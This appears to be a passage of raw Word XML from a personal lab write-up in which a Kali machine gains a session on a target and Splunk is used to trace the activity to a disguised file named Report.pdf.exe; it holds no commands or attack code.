        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Looking at the Kali machine should show that you are connected to the target and should allow you to execute commands on it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D68C0F8" w14:textId="06A3A0A1" w:rsidR="002C2B67" w:rsidRDefault="008737CD" w:rsidP="008737CD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="418AA8D4" wp14:editId="2B19D1BF">
            <wp:extent cx="6645910" cy="3989070"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10965062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06246" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3989070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC63E63" w14:textId="08BBF591" w:rsidR="002C2B67" w:rsidRDefault="002C2B67" w:rsidP="008737CD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC4782E" w14:textId="5794F8CC" w:rsidR="002C2B67" w:rsidRDefault="002C2B67" w:rsidP="002C2B67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Access Splunk and create an index with the name ‘endpoint’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2CFCA7" w14:textId="313DCD46" w:rsidR="003E059B" w:rsidRDefault="003E059B" w:rsidP="003E059B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AF8C388" wp14:editId="5622EE86">
            <wp:extent cx="6645910" cy="5391150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7014024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2466" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5391150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D775F31" w14:textId="77777777" w:rsidR="006C5973" w:rsidRDefault="006C5973" w:rsidP="003E059B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68BCE55F" w14:textId="78866D7A" w:rsidR="006C5973" w:rsidRDefault="003E0646" w:rsidP="003E0646">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the search and reporting app on Splunk and type ‘index=”endpoint” {Kali IP Address}’ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A2A6A2" w14:textId="71702B9A" w:rsidR="001B63DB" w:rsidRDefault="001B63DB" w:rsidP="001B63DB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7745977F" wp14:editId="158B5E14">
            <wp:extent cx="2809875" cy="1009650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="31707309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73091" name="Picture 1" descr="A black text on a white background&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2809875" cy="1009650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="731E2061" w14:textId="7B2396E6" w:rsidR="00942A03" w:rsidRPr="00B11A1F" w:rsidRDefault="00B11A1F" w:rsidP="00B11A1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Looking at the </w:t>
      </w:r>
      <w:r w:rsidR="006E30AA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fields, we can see that the Kali Linux machine is accessing a port, which would be something of interest to investigate</w:t>
      </w:r>
      <w:r w:rsidR="00087363">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC17C78" w14:textId="77777777" w:rsidR="00942A03" w:rsidRDefault="00942A03" w:rsidP="001B63DB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54BBEFA5" w14:textId="307F0334" w:rsidR="00942A03" w:rsidRDefault="00942A03" w:rsidP="001B63DB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13AAB7E9" wp14:editId="57983F3B">
            <wp:extent cx="2085975" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="14029261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26175" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2085975" cy="1600200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8C76EE" w14:textId="6ABC5269" w:rsidR="00087363" w:rsidRDefault="00087363" w:rsidP="00087363">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Looking further into the event IDs, we can see that the </w:t>
      </w:r>
      <w:r w:rsidR="00FD70B5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>issue comes from the Report.pdf.exe</w:t>
      </w:r>
      <w:r w:rsidR="00E407D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3943DF42" w14:textId="7B4C248D" w:rsidR="00E407D0" w:rsidRDefault="00E407D0" w:rsidP="00E407D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3323228B" wp14:editId="65F108EF">
            <wp:extent cx="4371975" cy="466725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="95320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200828" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4371975" cy="466725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB68E95" w14:textId="77777777" w:rsidR="0048449B" w:rsidRDefault="0048449B" w:rsidP="00E407D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0014C449" w14:textId="77777777" w:rsidR="0048449B" w:rsidRDefault="0048449B" w:rsidP="00E407D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15BDE628" w14:textId="3E9A782D" w:rsidR="0048449B" w:rsidRPr="00087363" w:rsidRDefault="0048449B" w:rsidP="0048449B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This was a simple demonstration of how </w:t>
      </w:r>
      <w:r w:rsidR="0097140E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">exploits can be used to target exposed ports, how malware can take control of </w:t>
      </w:r>
      <w:r w:rsidR="002F6A6A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a victim’s computer and how tools like Splunk can be used to detect unusual events which can allow for the user to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002F6A6A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>take action</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002F6A6A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and solve the problem</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0048449B" w:rsidRPr="00087363" w:rsidSect="00FB0A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65370"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="474E10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9996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6F"/>
    <w:rsid w:val="00060714"/>
    <w:rsid w:val="000642D1"/>
    <w:rsid w:val="00064EB3"/>
    <w:rsid w:val="00087363"/>
    <w:rsid w:val="000B50AC"/>
    <w:rsid w:val="000C6439"/>
    <w:rsid w:val="000D2C2C"/>
    <w:rsid w:val="000D33ED"/>
    <w:rsid w:val="000F7483"/>
    <w:rsid w:val="001B63DB"/>
    <w:rsid w:val="001C579F"/>
    <w:rsid w:val="001D1BD8"/>
    <w:rsid w:val="001D5AD4"/>
    <w:rsid w:val="001E4BAE"/>
    <w:rsid w:val="0027199B"/>
    <w:rsid w:val="002C2B67"/>
    <w:rsid w:val="002C36CD"/>
    <w:rsid w:val="002F13A7"/>
    <w:rsid w:val="002F69FD"/>
    <w:rsid w:val="002F6A6A"/>
    <w:rsid w:val="00332E2A"/>
    <w:rsid w:val="003E059B"/>
    <w:rsid w:val="003E0646"/>
    <w:rsid w:val="003E14D0"/>
    <w:rsid w:val="0047598F"/>
    <w:rsid w:val="0048449B"/>
    <w:rsid w:val="004C3D49"/>
    <w:rsid w:val="004E0924"/>
    <w:rsid w:val="005C4F0C"/>
    <w:rsid w:val="00685556"/>
    <w:rsid w:val="0069244B"/>
    <w:rsid w:val="006C5973"/>
    <w:rsid w:val="006D056F"/>
    <w:rsid w:val="006D6899"/>
    <w:rsid w:val="006E30AA"/>
    <w:rsid w:val="00726462"/>
    <w:rsid w:val="00730720"/>
    <w:rsid w:val="00817CE5"/>
    <w:rsid w:val="008737CD"/>
    <w:rsid w:val="008A64CD"/>
    <w:rsid w:val="008C1F40"/>
    <w:rsid w:val="00940D7B"/>
    <w:rsid w:val="00942A03"/>
    <w:rsid w:val="009445C3"/>
    <w:rsid w:val="0097140E"/>
    <w:rsid w:val="009C7FD4"/>
    <w:rsid w:val="00A06B30"/>
    <w:rsid w:val="00A72E10"/>
    <w:rsid w:val="00AB34AA"/>
    <w:rsid w:val="00B11A1F"/>
    <w:rsid w:val="00B82CF8"/>
    <w:rsid w:val="00BC6E4C"/>
    <w:rsid w:val="00BE4BF2"/>
    <w:rsid w:val="00C17045"/>
    <w:rsid w:val="00C33F7D"/>
    <w:rsid w:val="00C3613C"/>
    <w:rsid w:val="00C76ED6"/>
    <w:rsid w:val="00C9033E"/>
    <w:rsid w:val="00C9287A"/>
    <w:rsid w:val="00CA62B8"/>
    <w:rsid w:val="00CC57DC"/>
    <w:rsid w:val="00CE03AB"/>
    <w:rsid w:val="00D448F1"/>
    <w:rsid w:val="00D80071"/>
    <w:rsid w:val="00E407D0"/>
    <w:rsid w:val="00E54619"/>
    <w:rsid w:val="00E6563A"/>
    <w:rsid w:val="00E85398"/>
    <w:rsid w:val="00F131BC"/>
    <w:rsid w:val="00F37D49"/>
    <w:rsid w:val="00FB0A34"/>
    <w:rsid w:val="00FD70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D6A45"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CAFEC382-9CCF-4488-9180-85B901F9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56F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="006D0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56F"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="006D056F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006D056F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="006D056F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="006D0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56F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="006D05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2D59372B-A9BF-456B-9B0F-0FDD9A39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448</Words>
  <Characters>2558</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Mahal</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jaskaran Mahal</cp:lastModifiedBy>
  <cp:revision>68</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-02T15:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-11T10:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>